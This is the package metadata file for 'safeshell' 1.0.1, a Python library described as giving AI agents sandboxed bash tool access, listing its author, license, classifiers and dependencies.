Metadata-Version: 2.4
Name: safeshell
Version: 1.0.1
Summary: Secure, sandboxed bash tool access for AI agents
Project-URL: Homepage, https://github.com/Khadka-Bishal/safeshell
Project-URL: Repository, https://github.com/Khadka-Bishal/safeshell
Project-URL: Issues, https://github.com/Khadka-Bishal/safeshell/issues
Author: Bishal Khadka
License-Expression: MIT
License-File: LICENSE
Keywords: agent,ai,bash,langchain,pydantic-ai,sandbox,security
Classifier: Development Status :: 3 - Alpha
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Libraries :: Python Modules
Classifier: Typing :: Typed
Requires-Python: >=3.11
Requires-Dist: h11>=0.14.0
Requires-Dist: psutil>=5.9.0
Requires-Dist: pydantic>=2.0
Provides-Extra: dev
Requires-Dist: mypy>=1.13; extra == 'dev'
Requires-Dist: pytest-asyncio>=0.24; extra == 'dev'
Requires-Dist: pytest-cov>=6.0; extra == 'dev'
Requires-Dist: pytest>=8.0; extra == 'dev'
Requires-Dist: ruff>=0.8; extra == 'dev'
Provides-Extra: langchain
Requires-Dist: langchain-core>=0.3; extra == 'langchain'
Provides-Extra: pydantic-ai
Requires-Dist: pydantic-ai>=0.0.15; extra == 'pydantic-ai'
